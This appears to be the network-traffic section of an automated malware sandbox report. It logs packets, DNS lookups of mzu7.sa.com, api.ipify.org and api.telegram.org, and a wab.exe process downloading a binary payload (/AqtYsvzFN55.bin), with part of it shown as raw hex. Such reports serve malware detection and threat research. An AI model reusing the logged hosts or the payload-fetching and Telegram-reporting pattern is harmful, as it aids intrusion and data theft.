Mar 15, 2024 12:36:27.456990957 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.457057953 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.457432032 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.457493067 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.457787037 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.457848072 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.458276033 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.458332062 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.501872063 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.501962900 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.502031088 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.502087116 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.613563061 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.613645077 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.613997936 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.614064932 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.615490913 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.615557909 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.616022110 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.616085052 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.616353035 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.616414070 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.616765022 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.616832018 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.617320061 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.617377043 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.617697954 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.617760897 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.618032932 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.618099928 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.618475914 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.618536949 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.658799887 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.658863068 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.659190893 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.659251928 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.659575939 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.659642935 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.769952059 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.770047903 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.770334005 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.770405054 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.770756006 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.770814896 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.771109104 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.771177053 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.771502972 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.771562099 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.771899939 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.771965981 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.772011995 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.772061110 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.772067070 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.772083044 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.772130013 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.784404993 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.784420967 CET	443	49714	162.240.109.7	192.168.2.5
Mar 15, 2024 12:36:27.784431934 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:27.784552097 CET	49714	443	192.168.2.5	162.240.109.7
Mar 15, 2024 12:36:28.293024063 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.293102980 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:28.293209076 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.295491934 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.295528889 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:28.796735048 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:28.796920061 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.799242020 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.799254894 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:28.799668074 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:28.803220034 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:28.844276905 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:30.629475117 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:30.629620075 CET	443	49715	104.26.13.205	192.168.2.5
Mar 15, 2024 12:36:30.629712105 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:30.981293917 CET	49715	443	192.168.2.5	104.26.13.205
Mar 15, 2024 12:36:33.438747883 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.438819885 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:33.438926935 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.439382076 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.439414024 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:33.786663055 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:33.786760092 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.788914919 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.788944006 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:33.789351940 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:33.790666103 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:33.832240105 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.108104944 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.108402967 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.108433962 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.451260090 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.451358080 CET	443	49716	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.451509953 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.451757908 CET	49716	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.608659029 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.608705044 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.608784914 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.609179974 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.609194040 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.950700998 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:34.954467058 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:34.954482079 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.281440020 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.281693935 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:35.281716108 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.527699947 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.528126001 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.528162003 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:35.528177023 CET	443	49717	149.154.167.220	192.168.2.5
Mar 15, 2024 12:36:35.528311014 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:36:35.528424978 CET	49717	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.749665022 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.749751091 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:37:59.749851942 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.750463009 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.750487089 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:37:59.948385954 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.948421955 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:37:59.948522091 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.948935986 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:37:59.948949099 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.083672047 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.098388910 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.098469973 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.297630072 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.299468040 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.299494028 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.410876989 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.413317919 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.413372993 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.416665077 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.416699886 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.420587063 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.420619011 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.625791073 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.632539034 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.632567883 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.638566017 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.638581038 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:00.642556906 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:00.642575026 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:01.039092064 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:01.039180040 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:01.039191961 CET	443	49720	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:01.039263964 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:01.039721012 CET	49720	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:01.282516003 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:01.282593966 CET	443	49721	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:01.282695055 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:01.282726049 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:01.283587933 CET	49721	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:03.773988008 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:03.774039030 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:03.774113894 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:03.774365902 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:03.774384975 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:04.109847069 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:04.112940073 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:04.113025904 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:04.440108061 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:04.513711929 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:05.257780075 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:05.257833958 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:05.258002996 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:05.258030891 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:05.258119106 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:05.258147001 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:05.954960108 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:05.955041885 CET	443	49722	149.154.167.220	192.168.2.5
Mar 15, 2024 12:38:05.955041885 CET	49722	443	192.168.2.5	149.154.167.220
Mar 15, 2024 12:38:05.955092907 CET	49722	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2024 12:36:26.378416061 CET	52342	53	192.168.2.5	1.1.1.1
Mar 15, 2024 12:36:26.485752106 CET	53	52342	1.1.1.1	192.168.2.5
Mar 15, 2024 12:36:28.199744940 CET	56504	53	192.168.2.5	1.1.1.1
Mar 15, 2024 12:36:28.287472010 CET	53	56504	1.1.1.1	192.168.2.5
Mar 15, 2024 12:36:33.349852085 CET	49531	53	192.168.2.5	1.1.1.1
Mar 15, 2024 12:36:33.437979937 CET	53	49531	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 15, 2024 12:36:26.378416061 CET	192.168.2.5	1.1.1.1	0xb60d	Standard query (0)	mzu7.sa.com	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:28.199744940 CET	192.168.2.5	1.1.1.1	0xf476	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:33.349852085 CET	192.168.2.5	1.1.1.1	0x9950	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 15, 2024 12:36:26.485752106 CET	1.1.1.1	192.168.2.5	0xb60d	No error (0)	mzu7.sa.com	162.240.109.7	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:28.287472010 CET	1.1.1.1	192.168.2.5	0xf476	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:28.287472010 CET	1.1.1.1	192.168.2.5	0xf476	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:28.287472010 CET	1.1.1.1	192.168.2.5	0xf476	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 15, 2024 12:36:33.437979937 CET	1.1.1.1	192.168.2.5	0x9950	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mzu7.sa.com

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	162.240.109.7	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:36:26 UTC	171	OUT	GET /AqtYsvzFN55.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: mzu7.sa.com Cache-Control: no-cache
2024-03-15 11:36:27 UTC	249	IN	HTTP/1.1 200 OK Date: Fri, 15 Mar 2024 11:36:27 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 15 Mar 2024 06:11:39 GMT Accept-Ranges: bytes Content-Length: 249920 Content-Type: application/octet-stream
2024-03-15 11:36:27 UTC	7943	IN	Data Raw: 09 90 9d 47 80 a0 e1 8c 47 ef 93 2e 00 81 bf c9 26 c2 97 ca 77 f2 85 de 59 c5 fa f5 99 6c ef 39 ad ea ec a1 ec 7d 51 ca d0 97 0a 5a 5d 58 60 98 c6 01 ce 85 a3 04 e8 25 f7 36 dd 61 a3 5a 58 39 4f b3 f9 89 9a d2 6a b0 42 97 84 b2 2e 3d 12 50 25 de eb 1d 88 12 bd da 92 82 b6 db d6 5d 79 c7 f5 52 2e 2c a9 18 32 38 87 97 75 c7 91 33 c3 de 0b 11 77 15 18 5c 95 41 33 ac b4 31 8c a3 70 d4 72 f1 5f b7 3a 7a 6e 8e 4f aa fc 80 27 9c f1 4a d3 59 c2 d7 a2 61 bd f9 5e bc ae de 3c f2 80 28 12 88 e1 b3 5f 33 c3 cd f2 61 65 e2 4d 06 59 0a 3e 05 fe 8c e2 a5 2d 3b 9e fa b6 29 e0 02 33 2d 7d e5 6b 6a 18 87 15 40 c4 95 59 6a aa 07 94 c3 b3 0c b1 7e 62 eb 57 47 f3 76 a4 79 30 a6 85 7e 92 9a cf 98 d1 ab fb fc f4 b2 19 8c 30 fd e4 d5 13 25 c0 a6 28 26 2c 18 ac a3 ff 55 9a 77 2a Data Ascii: GG.&wYl9}QZ]X`%6aZX9OjB.=P%]yR.,28u3w\A31pr_:znO'JYa^<(_3aeMY>-;)3-}kj@Yj~bWGvy0~0%(&,Uw*
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 6e bc 68 ed f2 e1 a9 4f 16 ae 1c b7 72 95 54 05 f4 43 5c f0 2c d0 b0 a2 de 27 0d 6e 15 3d 84 6e 51 99 a3 5b 91 48 e1 ba f1 20 47 b7 2a c0 b4 8e 3e 57 d6 5c 86 11 64 1c a7 2c 68 7f c8 6b 49 ef 25 fb a2 30 19 54 2f 59 0f d5 76 65 d4 9b d4 3b f9 07 18 2a 4f 64 00 5d 5c f6 4f 33 16 4d 77 e1 77 47 d7 7b f6 07 48 c8 02 90 0e fe b8 5a 0c 83 08 4d 6d 53 7f 29 9f af c5 43 c9 9b da 82 ae 7d 60 7b 47 08 49 88 dd 7d 45 17 2c 28 6f 4f c6 4a 5a 2a cb 7d 6b 2c 60 8d 79 e0 23 1c b3 ce 5e f1 5f 45 64 c3 35 b7 92 34 f3 4f bc 46 02 78 91 48 4c 2d da 3e 11 42 fb 6e 61 1c 5c 2c 19 04 29 90 9c f6 dd b1 8d f9 fa b7 82 62 5c 39 cb c8 c8 e3 ac 4c d8 37 74 55 6a 8d b8 74 f3 4a 90 69 18 5e 41 47 41 0d 95 9f ef c5 ce c8 16 1b 59 2a 6d 5c c7 8d 1b 62 65 fc 36 e0 84 f3 a2 ac c4 8d 81 Data Ascii: nhOrTC\,'n=nQ[H G>W\d,hkI%0T/Yve;Od]\O3MwwG{HZMmS)C}`{GI}E,(oOJZ}k,`y#^_Ed54OFxHL->Bna\,)b\9L7tUjtJi^AGAYm\be6
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 83 86 98 9e ed 8b 50 73 12 86 44 ee b9 de 86 cd 7f 18 68 cc 0c 50 c5 b9 90 12 ff aa 9a ff f9 67 2b 52 81 ec 12 69 6b 90 72 fe d0 eb ab 2f 19 3b 82 91 3c f3 01 54 26 1c af 68 1e a0 ad 6e cf 2c 8d 71 21 1c a0 de 9a ee fa 9a ec cc 68 86 35 b1 f8 14 6f 01 4e d2 0e c8 c1 9b cb 77 76 2d 50 f9 cf 88 ac 41 75 d1 33 6d e2 80 fd dd f1 8a 15 0e 60 e1 92 13 c1 21 23 d3 64 72 cd 4e e3 bc 31 e7 c1 9f c1 45 5e ff f5 81 5a 25 2a f2 f5 19 ee d3 88 b5 30 bc cf aa 45 31 e0 db 4b 08 76 db 0e cb bb b4 62 d6 eb 51 3d d4 eb 3b d7 46 f4 2d c7 e3 37 2d 63 b0 62 53 7d 85 8b d3 49 44 ea 0d 72 47 5a a2 92 d1 3d f4 f9 96 68 6d 7a 09 c5 70 49 35 bb 85 8c 0d 49 a7 4e 56 5c b8 7b cf c7 e2 fe e3 88 f0 b3 ce 72 02 0a 4b 5b 9c 58 07 f3 c9 14 74 27 7a 6b e9 f8 79 76 01 ef 5b 23 d7 61 cc 76 Data Ascii: PsDhPg+Rikr/;<T&hn,q!h5oNwv-PAu3m`!#drN1E^Z%*0E1KvbQ=;F-7-cbS}IDrGZ=hmzpI5INV\{rK[Xt'zkyv[#av
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 2d ea 1a af 44 a0 23 dc e2 75 46 f9 fd 6e 12 94 42 07 82 71 f6 1e 38 32 5f bd bd 7d b5 68 37 fa b5 31 9b 81 b1 5f f1 58 f4 e7 fd ef d2 3d 25 99 df 52 04 11 14 46 7f 3a 6e 11 bd a8 56 d2 89 52 9b b0 1e 24 46 88 7f 24 76 a6 50 3a d8 5d 0a 5f 9d 7c 7d a7 69 6b f0 f9 b9 de b0 6e a9 1d 29 f8 58 cf 75 65 52 e8 b9 96 20 f5 19 65 9d da 61 30 db ff 5c 31 18 84 60 c0 8c e2 7a 14 53 30 f5 fd 86 69 47 5b 1b 6e 63 a7 be 44 25 ce e3 fa 33 50 86 19 d7 cf cd 26 33 7c c0 67 02 ff cc be 28 1c 61 aa 4c 18 11 01 41 4b 8b 6e 03 9b 25 b4 39 3b e9 90 06 fd e6 61 22 25 44 90 78 41 34 c5 84 4c 46 21 25 0a 90 25 4d e4 1d 79 2d fe 21 21 5e ca 76 2c 67 16 59 7b 7c 39 71 fb f8 7c 3d 73 db a6 08 8f 1c c3 25 70 76 e0 e6 f3 5c 92 65 42 08 1c 45 50 f8 6e da 7b e8 50 2d d1 e0 22 b8 7d 0c Data Ascii: -D#uFnBq82_}h71_X=%RF:nVR$F$vP:]_\|}ikn)XueR ea0\1`zS0iG[ncD%3P&3\|g(aLAKn%9;a"%DxA4LF!%%My-!!^v,gY{\|9q\|=s%pv\eBEPn{P-"}
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 94 41 35 95 c3 30 0c a3 8e d8 78 ee cd 15 3a ce 6d 2c dc 12 fd c6 85 10 a5 22 b0 02 b8 a6 d0 08 24 85 39 d1 ae bd 5d 9c ee b9 68 af 83 ee 4a 40 b6 a3 2c 04 0e c2 f7 45 0d 2a 21 47 95 e9 bc c7 bd 30 ba fc c4 16 ef 02 43 05 9e a0 6b 60 6d 80 17 40 a2 b9 8c 0a aa f9 98 c4 b3 7e e0 71 82 9b 3a db f9 77 a9 87 3e 68 86 80 9e 97 cf 66 dd ac fb 8e 71 58 1a fc 5f 40 e5 d5 15 db ca af 28 d8 60 1d ac 7d f3 52 9a 07 4f ca aa 1e 2f 27 7d 14 fa 76 87 8b a7 c2 cb 0e da 0d f5 1b fa 02 21 9a 62 00 ed d8 08 70 20 5d 9d 1f 87 a0 1c 48 4a 6c e3 d0 b7 f8 f9 7f 1a db 0e b7 61 28 96 f1 43 79 10 45 56 c3 6e 8d d2 0d 2d 2a 75 8a 06 95 22 c5 f3 75 96 f1 ae 08 f5 e6 38 7b e8 ee 2e 80 65 ef 33 38 24 de 20 99 aa 2c dd 53 a7 48 1b 44 77 ae 0a e4 6a 98 5f d7 3f 38 08 57 57 b7 4a a7 71 Data Ascii: A50x:m,"$9]hJ@,E!G0Ck`m@~q:w>hfqX_@(`}RO/'}v!bp ]HJla(CyEVn-u"u8{.e38$ ,SHDwj_?8WWJq
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: a7 4c 5d f8 66 67 43 f1 96 91 10 59 0c f3 08 2d 90 10 c1 cb b1 fd 68 1b b4 82 48 3a d7 cb c8 3c 8d e7 55 d8 31 8a a7 63 8c 46 58 f0 4a e2 62 25 67 31 28 a6 af b5 9f 80 2b ce 36 12 e6 55 2e 93 22 fd 98 3b 13 0a 11 36 1e 8f a5 5b ac c4 87 89 28 fd 43 93 73 21 da 27 aa 10 6e 89 26 f4 cf 03 c6 8e 2f e4 03 bd e4 a2 8c cd 6c 40 6f 31 fa b7 cf f4 14 bb 5c a7 c9 6a 77 31 6c 35 26 5b 5f 44 20 96 81 bf 28 b0 17 b5 45 b8 ba 31 24 f3 e4 a4 75 7f 90 a9 74 99 bb 93 c6 36 2c bf 0d 90 71 9f 49 06 37 0b 26 ba 10 0d 9c 4d 4d ce e5 2e 91 9d ed 55 2d 0a 92 c3 88 d7 6d 2d 31 10 77 d6 07 99 c9 43 72 1d 78 fc 78 02 8b 41 d0 3e 0b 3e 18 50 48 0f 29 ff 05 8d 38 18 09 e5 f3 62 9c 7c 28 9f d5 46 b3 28 3d 39 57 cd 53 33 0b 2f 7e 53 87 95 1f d3 3b 92 46 9d 8e af d2 97 a4 45 11 c6 9a Data Ascii: L]fgCY-hH:<U1cFXJb%g1(+6U.";6[(Cs!'n&/l@o1\jw1l5&[_D (E1$ut6,qI7&MM.U-m-1wCrxxA>>PH)8b\|(F(=9WS3/~S;FE
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 12 cb d2 3b 35 79 50 3d ee 3b 74 5b 4e 14 00 73 47 b5 8e 96 d1 52 f1 06 98 62 1f c9 81 d7 00 61 86 45 89 86 34 67 b6 4e 56 a2 4a 79 f6 bf 6d e5 e3 d2 bf 11 ce 72 08 0a 49 5a 9c a6 f5 fb c9 7b 51 4e 7a 61 9b 93 63 4f 59 c7 e8 23 29 62 f5 78 cf 8a f6 3e fa 72 e9 7a 72 b1 fa 0f a2 d1 d9 55 72 c6 21 3d f5 5f c6 97 25 6a 88 86 0e a2 f9 ac a2 ef 79 1e 57 e5 b2 9d 5f dc 70 dc 16 16 a8 e2 ff ff 53 fa 18 72 c9 e6 01 bd ba 2b b5 6f 24 57 d8 db 87 77 26 40 fb 10 53 63 2f 26 bf 37 10 e1 33 8b 19 3d 3f 15 eb cd a9 c2 db f7 45 88 de 3d 4f 77 34 79 9c 4d 0b 60 57 ff aa 18 72 84 79 c2 6a 9a 21 f8 78 e1 83 53 67 bd 50 e2 d2 1e 56 88 02 12 f5 48 8c 99 aa 09 85 96 a3 fc 5d f8 58 ae da 2d 48 6b 14 2e be 05 e1 e0 a0 51 6f 46 e5 ba c0 01 47 b7 2a 98 b4 8e 39 57 10 31 81 11 9a Data Ascii: ;5yP=;t[NsGRbaE4gNVJymrIZ{QNzacOY#)bx>rzrUr!=_%jyW_pSr+o$Ww&@Sc/&73=?E=Ow4yM`Wryj!xSgPVH]X-Hk.QoFG*9W1
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 54 1f 90 06 f7 18 7e 14 27 64 62 7e 41 34 be 5c 4c 57 0b db 06 96 25 cd 7e 1c 79 11 47 d9 21 5e c0 76 2c 60 16 59 51 7c 39 71 6a 2e 45 2f 79 25 aa f0 83 e2 cd 48 1c 89 ec e2 d3 1f 6d 65 42 fc ec 4a 53 f8 6e da 79 e8 8e 39 d0 e0 02 46 7c 35 a9 5c b7 ac f9 1a 22 18 04 b1 09 8a 10 72 ab 9f 3c 00 9d 3d aa 51 dd a7 12 61 47 bb d6 a8 37 9c 25 e8 c6 29 8e c3 0f a6 cd 54 b8 7b e7 99 24 71 a7 96 3c 0f 5c 60 ab be a9 3e c9 48 4c 2f 55 e2 51 a3 c1 e2 bc 24 8b e4 b6 35 67 78 5d 3f cd 19 ff fd 86 94 bf 20 49 97 ec 4f 0e 16 a0 43 30 70 3b 47 94 4d a4 2b 26 b0 24 0f fb 83 5d 6d 45 b8 bc 05 da 9d ff 31 20 ab 9b 78 91 9e 13 a2 25 1c ec 8a 4d 9c be b7 b9 16 53 0e 68 ec 1a 2d aa b9 6e 18 d0 af 9a 01 f5 96 25 70 95 ec ec 65 97 91 6b e5 d0 eb ab 2f 14 07 99 fe 14 f3 ff 57 06 Data Ascii: 